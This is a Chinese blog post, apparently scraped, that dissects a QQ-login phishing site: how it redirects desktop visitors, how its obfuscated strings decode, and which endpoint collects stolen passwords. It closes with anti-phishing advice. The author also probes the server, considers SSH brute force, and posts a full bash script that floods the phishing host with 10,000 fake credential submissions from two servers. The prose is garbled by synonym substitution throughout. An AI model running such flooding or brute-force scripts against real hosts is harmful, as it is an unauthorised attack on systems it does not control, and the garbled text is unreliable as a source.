对一次钓鱼事件的分析

2020-04-01 01:55:11

本文是对一次垂纶事件的剖析，鄙人水平实在不高，请路过的高手勿喷。像收集垂纶这种违法事件时不时地显现在我们身边，下面是本人的亲自履历。

[原文来自：www.ii77.com]

昨天在刷空间时看到同窗发了这么一条新闻，留言？ [原文来自：www.ii77.com]

打开看看，嗯，纰谬啊，我俩18年6月加的石友啊，这是什么情形？

带着满脑子问号，扫码进去，瞬间就小心了。

先瞎输一气，发现我的输入法纰谬劲啊，我用的讯飞输入法不长如许啊？

究竟进去了？！跳转到QQ空间手机网页版。难不成是垂纶？复制用浏览器打开，发现域名纰谬，果真是垂纶。

用电脑打开看看

百度？302重定向，emmm……摁F12看看，剖析一下响应日志，果真有发现

从这里不难发现我们如今接见的网址只不外是一个转发剧本，真正的页面是红线画的，302重定向就是他发出的。接见一下看看，同样也是被重定向到百度。

手机接见直接进入垂纶页面

领略了，网页写了判断，若是是手机就正常接见，若是是电脑就跳转到百度。用chrome模拟移动设备接见。

成功接见，然则我发现键盘使不了了，暗码框输不进去，禁用键盘，弹出了一个虚拟键盘让你输入账号暗码

能够一定这是为手机而量身定做的垂纶网站。从代码中能够看出，红线部门的“u”透露QQ号码，“p”透露暗码。黑线框起来的部门是生成虚拟键盘的代码，太长，就睁开了一段。

这段是跳转url，应该是用来提交信息的。

啊，一大串的字符串，看模样是BASE64加密的，BASE64在线解密https://www.bejson.com/enc/base64/

看模样这是层unicode，还要转换一下，转换之前需要把所有“%”号替代成“\”号。在线unicode转中文https://www.bejson.com/convert/unicode_chinese/

文字显露出来了

如法炮制，解密所有字符串

没什么可行使的器材。

随便输个账号暗码，发现先是接见了一个php页面然后跳转到H5QQ空间。这个dnf.php就应该是用来提交信息的。

查一下域名，竟然是企业办的。然则www打不开。反查下whois，究竟我惊了，这小我名下的域名有十万多个….站长之家http://tool.chinaz.com/

ping一下，再查询一下IP信息，确定没有CDN。

直接接见IP，好熟悉的一幕，这不是浮图吗？

接见默认8888端面试试，的确是浮图，然则没有平安进口和账号暗码什么的，就我这水平，搞他是弗成能的。22端口开放了，ssh爆破进展迷茫，888端口固然开放然则找不到phpmyadmin，php mysql注入判断还被阻挡……

倏忽想起他的提交页面，呵呵，搞不死他也得搞残他，必需得搞搞他！打开xshell，保持了我的云办事器，vim写了一个剧本，

代码如下


#!/bin/bashi=1  #界说变量until ((i>10000))  #让剧本一连执行10000次do  #起头轮回    function rand(){        min=$1        max=$(($2-$min+1))        num=$(($RANDOM+1000000000))        echo $(($num%$max+$min))                   }  #生成长度为十位的随机数        name=$(rand 1000000000 9999999999)  #界说QQ账号，1000000000-999999999的随机数        pwd=$(head -c 9 /dev/random | base64)  #界说暗码，12位的随机字符串        curl -v 'https://cdn.tldcnm.com/dnf.php?u='$name'&p='$pwd'' \  #提交post恳求，发送子虚账号暗码信息，好好填充一下他的数据库，并在执行时输出实时信息          -H 'authority: cdn.tldcnm.com' \          -H 'upgrade-insecure-requests: 1' \          -H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.43 Mobile Safari/537.36' \  #这里我们模拟成移动终端设备，不然或者提交不成功          -H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \          -H 'sec-fetch-site: same-origin' \          -H 'sec-fetch-mode: navigate' \          -H 'sec-fetch-user: ?1' \          -H 'sec-fetch-dest: document' \          -H 'referer: https://cdn.tldcnm.com/' \          -H 'accept-language: zh-CN,zh;q=0.9' \          -H 'cookie: PHPSESSID=cddh7cie2m1a8lmcqch2avtf37' \          --compressed        sync        echo 3 > /proc/sys/vm/drop_caches  #清理缓存，节约空间done  #轮回竣事

bash测试一下，看到输出信息，post提交成功而且一连提交10000次。

因为剧本提议的post恳求跟正常接见页面一般，不属于DDOS，浮图和防火墙不会阻挡，返回302则表明提交成功（提交成功后会被重定向，所以返回302）。为了提高效率我用两台办事器多线程一路跑，估量数据库里找到真实的账号暗码得费老劲了，全被无用的子虚数据覆没了。

问了一下同伙关于这张垂纶..图片的事，他透露并不知情，很有或者中病毒了。同时也敷陈了其他扫过这个码的人，通知他们实时地点窜暗码，包管本身的隐私和产业平安！

最后总结一下防钓经验：只如果让你输入账号暗码，就要考虑是不是垂纶网站，尽或者使用一键登录或许扫码上岸避免暗码泄露的风险。接见时看看网址域名，若是不是QQ官方域名并且没有快捷、一键登录选项那绝大多数都是垂纶的。本人已经将此信息提交到360举报..，阻止更多的人受骗受骗。进展每一个被垂纶的同伙都把垂纶网站举报，让360，腾讯等平安..实时提醒并阻挡正在接见垂纶页面的人，防止更多的人受骗受骗！